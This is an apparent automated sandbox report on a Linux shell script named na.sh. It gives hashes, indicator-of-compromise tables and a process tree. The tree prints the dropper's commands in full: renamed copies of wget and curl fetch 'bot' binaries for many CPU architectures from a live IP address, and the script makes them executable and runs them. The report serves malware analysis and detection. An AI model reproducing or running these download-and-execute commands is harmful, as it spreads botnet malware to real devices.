d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41

Analysis

max time kernel
95s
max time network
99s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
13/03/2024, 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.sh
Size

4KB
MD5

2bb334f185184c2073fef6318c9da1f1
SHA1

19118dda8b138600808af3458388b7d1abc2c46d
SHA256

d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41
SHA512

9c776ee57a44ad30c35998ad945efefdda56951c6ed9e8214635e92be1acb2b4690520806a606636958d50374038eaef4debfc08f98dd24bc3f653a96b94c50e
SSDEEP

24:af9+Jtd/FfwBJ4A/FffBKJ//FfEdJt/FfOnJJ/FfijJPd/FflqSgJV5/Ff1GJAG4:FrkDK4OilMSgY2zinTrcMcLsBal

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 45 IoCs

ioc	pid	Process
/tmp/sfdhesrfyhdjh	722	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	744	sfghfsdhdfhysdgs
/tmp/RUN	748	RUN
/tmp/sfdhesrfyhdjh	751	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	759	sfghfsdhdfhysdgs
/tmp/RUN	772	RUN
/tmp/sfdhesrfyhdjh	776	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	808	sfghfsdhdfhysdgs
/tmp/RUN	813	RUN
/tmp/sfdhesrfyhdjh	816	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	820	sfghfsdhdfhysdgs
/tmp/RUN	826	RUN
/tmp/sfdhesrfyhdjh	829	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	851	sfghfsdhdfhysdgs
/tmp/RUN	864	RUN
/tmp/sfdhesrfyhdjh	869	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	873	sfghfsdhdfhysdgs
/tmp/RUN	876	RUN
/tmp/sfdhesrfyhdjh	879	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	883	sfghfsdhdfhysdgs
/tmp/RUN	886	RUN
/tmp/sfdhesrfyhdjh	889	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	893	sfghfsdhdfhysdgs
/tmp/RUN	896	RUN
/tmp/sfdhesrfyhdjh	899	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	903	sfghfsdhdfhysdgs
/tmp/RUN	906	RUN
/tmp/sfdhesrfyhdjh	909	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	913	sfghfsdhdfhysdgs
/tmp/RUN	916	RUN
/tmp/sfdhesrfyhdjh	919	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	923	sfghfsdhdfhysdgs
/tmp/RUN	926	RUN
/tmp/sfdhesrfyhdjh	929	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	933	sfghfsdhdfhysdgs
/tmp/RUN	936	RUN
/tmp/sfdhesrfyhdjh	939	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	943	sfghfsdhdfhysdgs
/tmp/RUN	946	RUN
/tmp/sfdhesrfyhdjh	949	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	953	sfghfsdhdfhysdgs
/tmp/RUN	956	RUN
/tmp/sfdhesrfyhdjh	959	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	963	sfghfsdhdfhysdgs
/tmp/RUN	966	RUN

Reads runtime system information 45 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp

Writes file to tmp directory 46 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/bot.arc	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.arm5	sfghfsdhdfhysdgs
File opened for modification	/tmp/bot.arm6	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.spc	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/bot.m68k	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.i468	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/bot.sh4	sfghfsdhdfhysdgs
File opened for modification	/tmp/bot.x86	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/RUN	Process not Found
File opened for modification	/tmp/bot.ppc	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/bot.x86_64	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/bot.mips	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/bot.mpsl	sfghfsdhdfhysdgs
File opened for modification	/tmp/bot.arm	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.arm7	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.i686	sfghfsdhdfhysdgs

/tmp/na.sh
/tmp/na.sh
1⤵
PID:711
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:714
- /bin/chmod
  chmod +x na.sh sfdhesrfyhdjh systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:720
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.x86
  2⤵
  - Executes dropped EXE
  PID:722
- /usr/bin/wget
  wget http://103.172.79.74/bot.x86
  2⤵
  PID:733
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/chmod
  chmod +x na.sh sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:743
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.x86
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/cat
  cat bot.x86
  2⤵
  PID:746
- /bin/chmod
  chmod +x bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:747
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:748
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/chmod
  chmod +x bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:750
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.mips
  2⤵
  - Executes dropped EXE
  PID:751
- /usr/bin/wget
  wget http://103.172.79.74/bot.mips
  2⤵
  PID:752
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:756
- /bin/chmod
  chmod +x bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:758
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.mips
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:759
- /bin/cat
  cat bot.mips
  2⤵
  PID:769
- /bin/chmod
  chmod +x bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:770
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:772
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:773
- /bin/chmod
  chmod +x bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:775
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arc
  2⤵
  - Executes dropped EXE
  PID:776
- /usr/bin/wget
  wget http://103.172.79.74/bot.arc
  2⤵
  PID:786
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:806
- /bin/chmod
  chmod +x bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:807
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.arc
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/cat
  cat bot.arc
  2⤵
  PID:811
- /bin/chmod
  chmod +x bot.arc bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:812
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:813
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:814
- /bin/chmod
  chmod +x bot.arc bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:815
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.i468
  2⤵
  - Executes dropped EXE
  PID:816
- /usr/bin/wget
  wget http://103.172.79.74/bot.i468
  2⤵
  PID:817
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/chmod
  chmod +x bot.arc bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-b281f20349bc4f15a219eaeff4e97558-systemd-timedated.service-IXJxTe
  2⤵
  PID:819
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.i468
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:820
- /bin/cat
  cat bot.i468
  2⤵
  PID:824
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:825
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:826
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:828
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.i686
  2⤵
  - Executes dropped EXE
  PID:829
- /usr/bin/wget
  wget http://103.172.79.74/bot.i686
  2⤵
  PID:839
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:848
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:850
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.i686
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:851
- /bin/cat
  cat bot.i686
  2⤵
  PID:862
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:863
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:864
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:866
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:868
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.x86_64
  2⤵
  - Executes dropped EXE
  PID:869
- /usr/bin/wget
  wget http://103.172.79.74/bot.x86_64
  2⤵
  PID:870
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:872
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.x86_64
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:873
- /bin/cat
  cat bot.x86_64
  2⤵
  PID:874
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:875
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:876
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:877
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:878
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.mpsl
  2⤵
  - Executes dropped EXE
  PID:879
- /usr/bin/wget
  wget http://103.172.79.74/bot.mpsl
  2⤵
  PID:880
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:882
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.mpsl
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:883
- /bin/cat
  cat bot.mpsl
  2⤵
  PID:884
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:885
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:886
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:887
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:888
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arm
  2⤵
  - Executes dropped EXE
  PID:889
- /usr/bin/wget
  wget http://103.172.79.74/bot.arm
  2⤵
  PID:890
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:891
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:892
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.arm
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/cat
  cat bot.arm
  2⤵
  PID:894
- /bin/chmod
  chmod +x bot.arc bot.arm bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:895
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:897
- /bin/chmod
  chmod +x bot.arc bot.arm bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:898
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arm5
  2⤵
  - Executes dropped EXE
  PID:899
- /usr/bin/wget
  wget http://103.172.79.74/bot.arm5
  2⤵
  PID:900
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:901
- /bin/chmod
  chmod +x bot.arc bot.arm bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:902
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.arm5
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:903
- /bin/cat
  cat bot.arm5
  2⤵
  PID:904
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:905
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:907
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:908
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arm6
  2⤵
  - Executes dropped EXE
  PID:909
- /usr/bin/wget
  wget http://103.172.79.74/bot.arm6
  2⤵
  PID:910
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:911
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:912
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.arm6
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/cat
  cat bot.arm6
  2⤵
  PID:914
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:915
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:918
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arm7
  2⤵
  - Executes dropped EXE
  PID:919
- /usr/bin/wget
  wget http://103.172.79.74/bot.arm7
  2⤵
  PID:920
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:921
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:922
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.arm7
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/cat
  cat bot.arm7
  2⤵
  PID:924
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:925
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:927
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:928
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.ppc
  2⤵
  - Executes dropped EXE
  PID:929
- /usr/bin/wget
  wget http://103.172.79.74/bot.ppc
  2⤵
  PID:930
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:931
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:932
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.ppc
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:933
- /bin/cat
  cat bot.ppc
  2⤵
  PID:934
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.ppc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:935
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:936
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:937
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.ppc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:938
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.spc
  2⤵
  - Executes dropped EXE
  PID:939
- /usr/bin/wget
  wget http://103.172.79.74/bot.spc
  2⤵
  PID:940
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:941
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.ppc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:942
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.spc
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:943
- /bin/cat
  cat bot.spc
  2⤵
  PID:944
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.ppc bot.spc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:945
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:946
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.ppc bot.spc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:948
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.m68k
  2⤵
  - Executes dropped EXE
  PID:949
- /usr/bin/wget
  wget http://103.172.79.74/bot.m68k
  2⤵
  PID:950
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:951
- /bin/chmod
